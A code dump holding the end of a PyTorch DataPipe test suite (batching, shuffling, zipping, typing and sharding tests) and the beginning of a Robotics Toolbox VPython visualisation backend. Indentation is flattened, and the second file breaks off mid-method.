collate_dp_nl = input_dp_nl.collate()
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(collate_dp_nl)
for x, y in zip(collate_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y))
def test_batch_datapipe(self):
arrs = list(range(10))
input_dp = dp.iter.IterableWrapper(arrs)
with self.assertRaises(AssertionError):
input_dp.batch(batch_size=0)
# Default not drop the last batch
bs = 3
batch_dp = input_dp.batch(batch_size=bs)
self.assertEqual(len(batch_dp), 4)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), 1 if i == 3 else bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
# Drop the last batch
bs = 4
batch_dp = input_dp.batch(batch_size=bs, drop_last=True)
self.assertEqual(len(batch_dp), 2)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
input_dp_nl = IDP_NoLen(range(10))
batch_dp_nl = input_dp_nl.batch(batch_size=2)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(batch_dp_nl)
def test_unbatch_datapipe(self):
target_length = 6
prebatch_dp = dp.iter.IterableWrapper(range(target_length))
input_dp = prebatch_dp.batch(3)
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[0, 1, 2], [3, 4, 5]])
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[[0, 1], [2, 3]], [[4, 5], [6, 7]]])
unbatch_dp = input_dp.unbatch()
expected_dp = [[0, 1], [2, 3], [4, 5], [6, 7]]
self.assertEqual(len(list(unbatch_dp)), 4)
for i, res in zip(expected_dp, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=2)
expected_dp2 = [0, 1, 2, 3, 4, 5, 6, 7]
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=-1)
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[0, 1, 2], [3, 4, 5]])
with self.assertRaises(ValueError):
unbatch_dp = input_dp.unbatch(unbatch_level=-2)
for i in unbatch_dp:
print(i)
with self.assertRaises(IndexError):
unbatch_dp = input_dp.unbatch(unbatch_level=5)
for i in unbatch_dp:
print(i)
def test_bucket_batch_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(20))
with self.assertRaises(AssertionError):
dp.iter.BucketBatcher(input_dp, batch_size=0)
input_dp_nl = IDP_NoLen(range(20))
bucket_dp_nl = dp.iter.BucketBatcher(input_dp_nl, batch_size=7)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(bucket_dp_nl)
def _helper(**kwargs):
data_len = 100
arrs = list(range(data_len))
random.shuffle(arrs)
input_dp = dp.iter.IterableWrapper(arrs)
bucket_dp = dp.iter.BucketBatcher(input_dp, **kwargs)
self.assertEqual(len(bucket_dp), data_len // 3 if kwargs['drop_last'] else data_len // 3 + 1)
def _verify_bucket_sorted(bucket):
# Sort batch in a bucket
bucket = sorted(bucket, key=lambda x: x[0])
flat = [item for batch in bucket for item in batch]
# Elements in the bucket should be sorted
self.assertEqual(flat, sorted(flat))
batch_num = kwargs['batch_num'] if 'batch_num' in kwargs else 100
bucket = []
for idx, d in enumerate(bucket_dp):
self.assertEqual(d, sorted(d))
bucket.append(d)
if idx % batch_num == batch_num - 1:
_verify_bucket_sorted(bucket)
bucket = []
_verify_bucket_sorted(bucket)
def _sort_fn(data):
return sorted(data)
# In-batch shuffle
_helper(batch_size=3, drop_last=False, batch_num=5, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=False, batch_num=2, bucket_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, bucket_num=2, sort_key=_sort_fn)
def test_filter_datapipe(self):
input_ds = dp.iter.IterableWrapper(range(10))
def _filter_fn(data, val, clip=False):
if clip:
return data >= val
return True
filter_dp = input_ds.filter(partial(_filter_fn, val=5))
for data, exp in zip(filter_dp, range(10)):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(partial(_filter_fn, val=5, clip=True))
for data, exp in zip(filter_dp, range(5, 10)):
self.assertEqual(data, exp)
with self.assertRaisesRegex(TypeError, r"has no len"):
len(filter_dp)
def _non_bool_fn(data):
return 1
filter_dp = input_ds.filter(filter_fn=_non_bool_fn)
with self.assertRaises(ValueError):
temp = list(filter_dp)
def test_sampler_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
# Default SequentialSampler
sampled_dp = dp.iter.Sampler(input_dp) # type: ignore[var-annotated]
self.assertEqual(len(sampled_dp), 10)
for i, x in enumerate(sampled_dp):
self.assertEqual(x, i)
# RandomSampler
random_sampled_dp = dp.iter.Sampler(input_dp, sampler=RandomSampler, sampler_kwargs={'replacement': True}) # type: ignore[var-annotated] # noqa: B950
# Requires `__len__` to build SamplerDataPipe
input_dp_nolen = IDP_NoLen(range(10))
with self.assertRaises(AssertionError):
sampled_dp = dp.iter.Sampler(input_dp_nolen)
def test_shuffle_datapipe(self):
exp = list(range(20))
input_ds = dp.iter.IterableWrapper(exp)
with self.assertRaises(AssertionError):
shuffle_dp = input_ds.shuffle(buffer_size=0)
for bs in (5, 20, 25):
shuffle_dp = input_ds.shuffle(buffer_size=bs)
self.assertEqual(len(shuffle_dp), len(input_ds))
random.seed(123)
res = list(shuffle_dp)
self.assertEqual(sorted(res), exp)
# Test Deterministic
for num_workers in (0, 1):
random.seed(123)
dl = DataLoader(shuffle_dp, num_workers=num_workers, worker_init_fn=_worker_init_fn, shuffle=True)
dl_res = list(dl)
self.assertEqual(res, dl_res)
shuffle_dp_nl = IDP_NoLen(range(20)).shuffle(buffer_size=5)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(shuffle_dp_nl)
def test_zip_datapipe(self):
with self.assertRaises(TypeError):
dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), list(range(10))) # type: ignore[arg-type]
zipped_dp = dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), IDP_NoLen(range(5))) # type: ignore[var-annotated]
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(zipped_dp)
exp = list((i, i) for i in range(5))
self.assertEqual(list(zipped_dp), exp)
zipped_dp = dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), dp.iter.IterableWrapper(range(5)))
self.assertEqual(len(zipped_dp), 5)
self.assertEqual(list(zipped_dp), exp)
# Reset
self.assertEqual(list(zipped_dp), exp)
class TestFunctionalMapDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (), {}),
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (_fake_fn, (0,)), {}),
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (partial(_fake_add, 1), (0,)), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (lambda x: x,), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(
str(wa[0].message), r"^Lambda function is not supported for pickle"
)
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_sequence_wrapper_datapipe(self):
seq = list(range(10))
input_dp = dp.map.SequenceWrapper(seq)
# Functional Test: all elements are equal in the same order
self.assertEqual(seq, list(input_dp))
# Functional Test: confirm deepcopy works by default
seq.append(11)
self.assertEqual(list(range(10)), list(input_dp)) # input_dp shouldn't have 11
# Functional Test: non-deepcopy version is working
seq2 = [1, 2, 3]
input_dp_non_deep = dp.map.SequenceWrapper(seq2, deepcopy=False)
seq2.append(4)
self.assertEqual(list(seq2), list(input_dp_non_deep)) # should have 4
# Reset Test: reset the DataPipe
seq = list(range(10))
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(input_dp, n_elements_before_reset)
self.assertEqual(list(range(5)), res_before_reset)
self.assertEqual(seq, res_after_reset)
# __len__ Test: inherits length from sequence
self.assertEqual(len(seq), len(input_dp))
def test_concat_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
for index in range(15):
self.assertEqual(concat_dp[index], (list(range(10)) + list(range(5)))[index])
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_zip_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper(range(5))
input_dp3 = dp.map.SequenceWrapper(range(15))
# Functional Test: requires at least one input DataPipe
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Zipper()
# Functional Test: all inputs must be MapDataPipes
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Zipper(input_dp1, ()) # type: ignore[arg-type]
# Functional Test: Zip the elements up as a tuples
zip_dp = input_dp1.zip(input_dp2, input_dp3)
self.assertEqual([(i, i, i) for i in range(5)], [zip_dp[i] for i in range(5)])
# Functional Test: Raise IndexError when index equal or exceed the length of the shortest DataPipe
with self.assertRaisesRegex(IndexError, r"out of range"):
input_dp1.zip(input_dp2, input_dp3)[5]
# __len__ Test: returns the length of the shortest DataPipe
zip_dp = input_dp1.zip(input_dp2, input_dp3)
self.assertEqual(5, len(zip_dp))
def test_shuffler_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper({'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5})
# Functional Test: Assumes 0-index when indices is not given
shuffler_dp = input_dp1.shuffle()
self.assertEqual(set(range(10)), set(shuffler_dp))
# Functional Test: Custom indices are working
shuffler_dp = dp.map.Shuffler(input_dp2, indices=['a', 'b', 'c', 'd', 'e'])
self.assertEqual(set(range(1, 6)), set(shuffler_dp))
# # Reset Test:
shuffler_dp = input_dp1.shuffle()
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(shuffler_dp, n_elements_before_reset)
self.assertEqual(5, len(res_before_reset))
for x in res_before_reset:
self.assertTrue(x in set(range(10)))
self.assertEqual(set(range(10)), set(res_after_reset))
# __len__ Test: returns the length of the input DataPipe
shuffler_dp = input_dp1.shuffle()
self.assertEqual(10, len(shuffler_dp))
def test_map_datapipe(self):
arr = range(10)
input_dp = dp.map.SequenceWrapper(arr)
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.float)
)
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
)
def test_batch_datapipe(self):
arr = list(range(13))
input_dp = dp.map.SequenceWrapper(arr)
# Functional Test: batches top level by default
batch_dp = dp.map.Batcher(input_dp, batch_size=2)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11], [12]], list(batch_dp))
# Functional Test: drop_last on command
batch_dp = dp.map.Batcher(input_dp, batch_size=2, drop_last=True)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]], list(batch_dp))
# Functional Test: nested batching
batch_dp_2 = batch_dp.batch(batch_size=3)
self.assertEqual([[[0, 1], [2, 3], [4, 5]], [[6, 7], [8, 9], [10, 11]]], list(batch_dp_2))
# Reset Test:
n_elements_before_reset = 3
res_before_reset, res_after_reset = reset_after_n_next_calls(batch_dp, n_elements_before_reset)
self.assertEqual([[0, 1], [2, 3], [4, 5]], res_before_reset)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]], res_after_reset)
# __len__ Test:
self.assertEqual(6, len(batch_dp))
self.assertEqual(2, len(batch_dp_2))
# Metaclass conflict for Python 3.6
# Multiple inheritance with NamedTuple is not supported for Python 3.9
_generic_namedtuple_allowed = sys.version_info >= (3, 7) and sys.version_info < (3, 9)
if _generic_namedtuple_allowed:
class InvalidData(Generic[T_co], NamedTuple):
name: str
data: T_co
class TestTyping(TestCase):
def test_subtype(self):
from torch.utils.data._typing import issubtype
basic_type = (int, str, bool, float, complex,
list, tuple, dict, set, T_co)
for t in basic_type:
self.assertTrue(issubtype(t, t))
self.assertTrue(issubtype(t, Any))
if t == T_co:
self.assertTrue(issubtype(Any, t))
else:
self.assertFalse(issubtype(Any, t))
for t1, t2 in itertools.product(basic_type, basic_type):
if t1 == t2 or t2 == T_co:
self.assertTrue(issubtype(t1, t2))
else:
self.assertFalse(issubtype(t1, t2))
T = TypeVar('T', int, str)
S = TypeVar('S', bool, Union[str, int], Tuple[int, T]) # type: ignore[valid-type]
types = ((int, Optional[int]),
(List, Union[int, list]),
(Tuple[int, str], S),
(Tuple[int, str], tuple),
(T, S),
(S, T_co),
(T, Union[S, Set]))
for sub, par in types:
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
subscriptable_types = {
List: 1,
Tuple: 2, # use 2 parameters
Set: 1,
Dict: 2,
}
for subscript_type, n in subscriptable_types.items():
for ts in itertools.combinations(types, n):
subs, pars = zip(*ts)
sub = subscript_type[subs] # type: ignore[index]
par = subscript_type[pars] # type: ignore[index]
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
# Non-recursive check
self.assertTrue(issubtype(par, sub, recursive=False))
def test_issubinstance(self):
from torch.utils.data._typing import issubinstance
basic_data = (1, '1', True, 1., complex(1., 0.))
basic_type = (int, str, bool, float, complex)
S = TypeVar('S', bool, Union[str, int])
for d in basic_data:
self.assertTrue(issubinstance(d, Any))
self.assertTrue(issubinstance(d, T_co))
if type(d) in (bool, int, str):
self.assertTrue(issubinstance(d, S))
else:
self.assertFalse(issubinstance(d, S))
for t in basic_type:
if type(d) == t:
self.assertTrue(issubinstance(d, t))
else:
self.assertFalse(issubinstance(d, t))
# list/set
dt = (([1, '1', 2], List), (set({1, '1', 2}), Set))
for d, t in dt:
self.assertTrue(issubinstance(d, t))
self.assertTrue(issubinstance(d, t[T_co])) # type: ignore[index]
self.assertFalse(issubinstance(d, t[int])) # type: ignore[index]
# dict
d = dict({'1': 1, '2': 2.})
self.assertTrue(issubinstance(d, Dict))
self.assertTrue(issubinstance(d, Dict[str, T_co]))
self.assertFalse(issubinstance(d, Dict[str, int]))
# tuple
d = (1, '1', 2)
self.assertTrue(issubinstance(d, Tuple))
self.assertTrue(issubinstance(d, Tuple[int, str, T_co]))
self.assertFalse(issubinstance(d, Tuple[int, Any]))
self.assertFalse(issubinstance(d, Tuple[int, int, int]))
# Static checking annotation
def test_compile_time(self):
with self.assertRaisesRegex(TypeError, r"Expected 'Iterator' as the return"):
class InvalidDP1(IterDataPipe[int]):
def __iter__(self) -> str: # type: ignore[misc, override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP2(IterDataPipe[Tuple]):
def __iter__(self) -> Iterator[int]: # type: ignore[override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP3(IterDataPipe[Tuple[int, str]]):
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
if _generic_namedtuple_allowed:
with self.assertRaisesRegex(TypeError, r"is not supported by Python typing"):
class InvalidDP4(IterDataPipe["InvalidData[int]"]): # type: ignore[type-arg, misc]
pass
class DP1(IterDataPipe[Tuple[int, str]]):
def __init__(self, length):
self.length = length
def __iter__(self) -> Iterator[Tuple[int, str]]:
for d in range(self.length):
yield d, str(d)
self.assertTrue(issubclass(DP1, IterDataPipe))
dp1 = DP1(10)
self.assertTrue(DP1.type.issubtype(dp1.type) and dp1.type.issubtype(DP1.type))
dp1_ = DP1(5)
self.assertEqual(dp1.type, dp1_.type)
with self.assertRaisesRegex(TypeError, r"is not a generic class"):
class InvalidDP5(DP1[tuple]): # type: ignore[type-arg]
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
class DP2(IterDataPipe[T_co]):
def __iter__(self) -> Iterator[T_co]:
for d in range(10):
yield d # type: ignore[misc]
self.assertTrue(issubclass(DP2, IterDataPipe))
dp2 = DP2() # type: ignore[var-annotated]
self.assertTrue(DP2.type.issubtype(dp2.type) and dp2.type.issubtype(DP2.type))
dp2_ = DP2() # type: ignore[var-annotated]
self.assertEqual(dp2.type, dp2_.type)
class DP3(IterDataPipe[Tuple[T_co, str]]):
r""" DataPipe without fixed type with __init__ function"""
def __init__(self, datasource):
self.datasource = datasource
def __iter__(self) -> Iterator[Tuple[T_co, str]]:
for d in self.datasource:
yield d, str(d)
self.assertTrue(issubclass(DP3, IterDataPipe))
dp3 = DP3(range(10)) # type: ignore[var-annotated]
self.assertTrue(DP3.type.issubtype(dp3.type) and dp3.type.issubtype(DP3.type))
dp3_ = DP3(5) # type: ignore[var-annotated]
self.assertEqual(dp3.type, dp3_.type)
class DP4(IterDataPipe[tuple]):
r""" DataPipe without __iter__ annotation"""
def __iter__(self):
raise NotImplementedError
self.assertTrue(issubclass(DP4, IterDataPipe))
dp4 = DP4()
self.assertTrue(dp4.type.param == tuple)
class DP5(IterDataPipe):
r""" DataPipe without type annotation"""
def __iter__(self) -> Iterator[str]:
raise NotImplementedError
self.assertTrue(issubclass(DP5, IterDataPipe))
dp5 = DP5()
from torch.utils.data._typing import issubtype
self.assertTrue(issubtype(dp5.type.param, Any) and issubtype(Any, dp5.type.param))
class DP6(IterDataPipe[int]):
r""" DataPipe with plain Iterator"""
def __iter__(self) -> Iterator:
raise NotImplementedError
self.assertTrue(issubclass(DP6, IterDataPipe))
dp6 = DP6()
self.assertTrue(dp6.type.param == int)
class DP7(IterDataPipe[Awaitable[T_co]]):
r""" DataPipe with abstract base class"""
self.assertTrue(issubclass(DP7, IterDataPipe))
self.assertTrue(DP7.type.param == Awaitable[T_co])
class DP8(DP7[str]):
r""" DataPipe subclass from a DataPipe with abc type"""
self.assertTrue(issubclass(DP8, IterDataPipe))
self.assertTrue(DP8.type.param == Awaitable[str])
def test_construct_time(self):
class DP0(IterDataPipe[Tuple]):
@argument_validation
def __init__(self, dp: IterDataPipe):
self.dp = dp
def __iter__(self) -> Iterator[Tuple]:
for d in self.dp:
yield d, str(d)
class DP1(IterDataPipe[int]):
@argument_validation
def __init__(self, dp: IterDataPipe[Tuple[int, str]]):
self.dp = dp
def __iter__(self) -> Iterator[int]:
for a, b in self.dp:
yield a
# Non-DataPipe input with DataPipe hint
datasource = [(1, '1'), (2, '2'), (3, '3')]
with self.assertRaisesRegex(TypeError, r"Expected argument 'dp' as a IterDataPipe"):
dp0 = DP0(datasource)
dp0 = DP0(dp.iter.IterableWrapper(range(10)))
with self.assertRaisesRegex(TypeError, r"Expected type of argument 'dp' as a subtype"):
dp1 = DP1(dp0)
def test_runtime(self):
class DP(IterDataPipe[Tuple[int, T_co]]):
def __init__(self, datasource):
self.ds = datasource
@runtime_validation
def __iter__(self) -> Iterator[Tuple[int, T_co]]:
for d in self.ds:
yield d
dss = ([(1, '1'), (2, '2')],
[(1, 1), (2, '2')])
for ds in dss:
dp0 = DP(ds) # type: ignore[var-annotated]
self.assertEqual(list(dp0), ds)
# Reset __iter__
self.assertEqual(list(dp0), ds)
dss = ([(1, 1), ('2', 2)], # type: ignore[assignment, list-item]
[[1, '1'], [2, '2']], # type: ignore[list-item]
[1, '1', 2, '2'])
for ds in dss:
dp0 = DP(ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp0)
with runtime_validation_disabled():
self.assertEqual(list(dp0), ds)
with runtime_validation_disabled():
self.assertEqual(list(dp0), ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp0)
def test_reinforce(self):
T = TypeVar('T', int, str)
class DP(IterDataPipe[T]):
def __init__(self, ds):
self.ds = ds
@runtime_validation
def __iter__(self) -> Iterator[T]:
for d in self.ds:
yield d
ds = list(range(10))
# Valid type reinforcement
dp0 = DP(ds).reinforce_type(int)
self.assertTrue(dp0.type, int)
self.assertEqual(list(dp0), ds)
# Invalid type
with self.assertRaisesRegex(TypeError, r"'expected_type' must be a type"):
dp1 = DP(ds).reinforce_type(1)
# Type is not subtype
with self.assertRaisesRegex(TypeError, r"Expected 'expected_type' as subtype of"):
dp2 = DP(ds).reinforce_type(float)
# Invalid data at runtime
dp3 = DP(ds).reinforce_type(str)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp3)
# Context Manager to disable the runtime validation
with runtime_validation_disabled():
self.assertEqual(list(d for d in dp3), ds)
class NumbersDataset(IterDataPipe):
def __init__(self, size=10):
self.size = size
def __iter__(self):
for i in range(self.size):
yield i
class TestGraph(TestCase):
@skipIfNoDill
def test_simple_traverse(self):
numbers_dp = NumbersDataset(size=50)
mapped_dp = numbers_dp.map(lambda x: x * 10)
graph = torch.utils.data.graph.traverse(mapped_dp)
expected: Dict[Any, Any] = {mapped_dp: {numbers_dp: {}}}
self.assertEqual(expected, graph)
@skipIfNoDill
def test_traverse_forked(self):
numbers_dp = NumbersDataset(size=50)
dp0, dp1, dp2 = numbers_dp.fork(num_instances=3)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd, dp2)
graph = torch.utils.data.graph.traverse(combined_dp)
expected = {combined_dp: {dp0_upd: {dp0: {dp0.main_datapipe: {dp0.main_datapipe.main_datapipe: {}}}},
dp1_upd: {dp1: {dp1.main_datapipe: {dp1.main_datapipe.main_datapipe: {}}}},
dp2: {dp2.main_datapipe: {dp2.main_datapipe.main_datapipe: {}}}}}
self.assertEqual(expected, graph)
class TestSharding(TestCase):
def _get_pipeline(self):
numbers_dp = NumbersDataset(size=10)
dp0, dp1 = numbers_dp.fork(num_instances=2)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd)
return combined_dp
@skipIfNoDill
def test_simple_sharding(self):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp, 3, 1)
items = list(sharded_dp)
self.assertEqual([1, 20, 40, 70], items)
all_items = list(self._get_pipeline())
items = []
for i in range(3):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp, 3, i)
items += list(sharded_dp)
self.assertEqual(sorted(all_items), sorted(items))
def test_sharding_length(self):
numbers_dp = dp.iter.IterableWrapper(range(13))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp0, 3, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp1, 3, 1)
sharded_dp2 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp2, 3, 2)
self.assertEqual(13, len(numbers_dp))
self.assertEqual(5, len(sharded_dp0))
self.assertEqual(4, len(sharded_dp1))
self.assertEqual(4, len(sharded_dp2))
numbers_dp = dp.iter.IterableWrapper(range(1))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp0, 2, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.graph_settings.apply_sharding(sharded_dp1, 2, 1)
self.assertEqual(1, len(sharded_dp0))
self.assertEqual(0, len(sharded_dp1))
@skipIfNoDill
def test_old_dataloader(self):
dp0 = self._get_pipeline()
expected = list(dp0)
dp0 = self._get_pipeline().sharding_filter()
dl = DataLoader(dp0, batch_size=1, shuffle=False, num_workers=2,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
items = []
for i in dl:
items.append(i)
self.assertEqual(sorted(expected), sorted(items))
if __name__ == '__main__':
run_tests()
|
VPython.py
|
#!/usr/bin/env python
"""
@author Micah Huth
"""
import importlib
import threading
import glob
import os
import platform
import warnings
from time import perf_counter, sleep
import imageio
from roboticstoolbox.backends.Connector import Connector
_GraphicsCanvas3D = None
_GraphicsCanvas2D = None
_GraphicalRobot = None
close_localhost_session = None
try:
from roboticstoolbox.backends.VPython.canvas import GraphicsCanvas2D, GraphicsCanvas3D, UImode
from roboticstoolbox.backends.VPython.graphicalrobot import GraphicalRobot
from roboticstoolbox.backends.VPython.grid import GridType
except ImportError:
print(
'\nYou must install the VPython component of the toolbox, do: \n'
'pip install roboticstoolbox[vpython]\n\n')
class VPython(Connector): # pragma nocover
"""
Graphical backend using VPython
VPython is a Python API that connects to a JavaScript/WebGL 3D graphics
engine in a browser tab. It supports many 3D graphical primitives
including meshes, boxes, ellipsoids and lines. It can not render in
full color.
Example:
.. code-block:: python
:linenos:
import roboticstoolbox as rtb
robot = rtb.models.DH.Panda() # create a robot
pyplot = rtb.backends.VPython() # create a VPython backend
pyplot.add(robot) # add the robot to the backend
robot.q = robot.qz # set the robot configuration
pyplot.step() # update the backend and graphical view
:references:
- https://vpython.org
"""
# TODO be able to add ellipsoids (vellipse, fellipse)
# TODO be able add lines (for end-effector paths)
def __init__(self, **kwargs):
"""
Open a localhost session with no canvases
"""
super(VPython, self).__init__()
# Init vars
self.canvases = []
# 2D array of [is_3d, height, width, title, caption, grid] per canvas
self.canvas_settings = []
self.robots = []
self._recording = False
self._recording_thread = None
self._recording_fps = None
self._thread_lock = threading.Lock()
self.launch_options = kwargs # save launch options
self._create_empty_session()
def __repr__(self):
s = f"VPython backend, t = {self.sim_time}, scene:"
for robot in self.robots:
s += f"\n {robot.name}"
return s
def launch(
self, **kwargs):
"""
Launch a graphical backend in a browser tab
``env = launch(args)` create a 3D scene in a new browser tab as
defined by args, and returns a reference to the backend.
"""
# merge instantiation & launch options
args = {**self.launch_options, **kwargs}
is_3d = args.get('is_3d', True)
height = args.get('height', 500)
width = args.get('width', 888)
title = args.get('title', 'Robotics Toolbox for Python: VPython display')
caption = args.get('caption', '')
grid = args.get('grid', False)
if is_3d:
g_type = args.get('g_type', GridType.XY3D)
else:
g_type = args.get('g_type', GridType.XY2D)
g_col = args.get('g_col', None)
super().launch()
self.canvas_settings.append(
[is_3d, height, width, title, caption, grid, g_type, g_col])
# Create the canvas with the given information
if is_3d:
self.canvases.append(
GraphicsCanvas3D(height, width, title, caption,
grid, g_type, g_col))
else:
self.canvases.append(
GraphicsCanvas2D(height, width, title, caption,
grid, g_type, g_col))
self.sim_time = 0
def step(self, dt=None, id=None, q=None, fig_num=0):
"""
Update the graphical scene
:param id: The Identification of the robot to move. Can be either the
DHRobot or GraphicalRobot
:type id: :class:`~roboticstoolbox.robot.DHRobot.DHRobot`,
:class:`roboticstoolbox.backends.VPython.graphics_robot.GraphicalRobot`
:param q: The joint angles/configuration of the robot (Optional, if not
supplied will use the stored q values).
:type q: float ndarray(n)
:param fig_num: The canvas index to delete the robot from, defaults to
the initial one
:type fig_num: int, optional
:raises ValueError: Figure number must be between 0 and total number of
canvases
:raises TypeError: Input must be a DHLink or GraphicalRobot
``env.step(args)`` triggers an update of the 3D scene in the browser
window referenced by ``env``.
.. note::
- Each robot in the scene is updated based on
their control type (position, velocity, acceleration, or torque).
- Upon acting, the other three of the four control types will be
updated in the internal state of the robot object.
- The control type is defined by the robot object, and not all
robot objects support all control types.
- Execution is blocked for the specified interval
"""
super().step()
self.sim_time += dt
if fig_num < 0 or fig_num >= len(self.canvases):
raise ValueError(
"Figure number must be between 0 and total number of canvases")
# If GraphicalRobot given
if isinstance(id, GraphicalRobot):
if self.canvases[fig_num].is_robot_in(id):
id.fkine_and_set(q)
if self.canvases[fig_num].current_mode() == UImode.TEACHPANEL:
# Reload the joint sliders
self.canvases[fig_num].teach_mode(teach=True)
# If DHRobot is given (or equivalent)
else:
graphical_dh_robot = None
# If no ID given, and there are robots available
if id is None and len(self.robots) > 0:
# Obtain the first one
graphical_dh_robot = self.robots[0]
# If no ID, and no robots available
elif id is None:
print("No robot found")
return
else:
# Find first occurrence of it that is in the correct canvas
for i in range(len(self.robots)):
if self.robots[i].robot is id and \
self.canvases[fig_num].is_robot_in_canvas(
self.robots[i]):
graphical_dh_robot = self.robots[i]
break
# If no graphical equivalent found, return
if graphical_dh_robot is None:
print("No robot found")
return
# Set poses of graphical robot
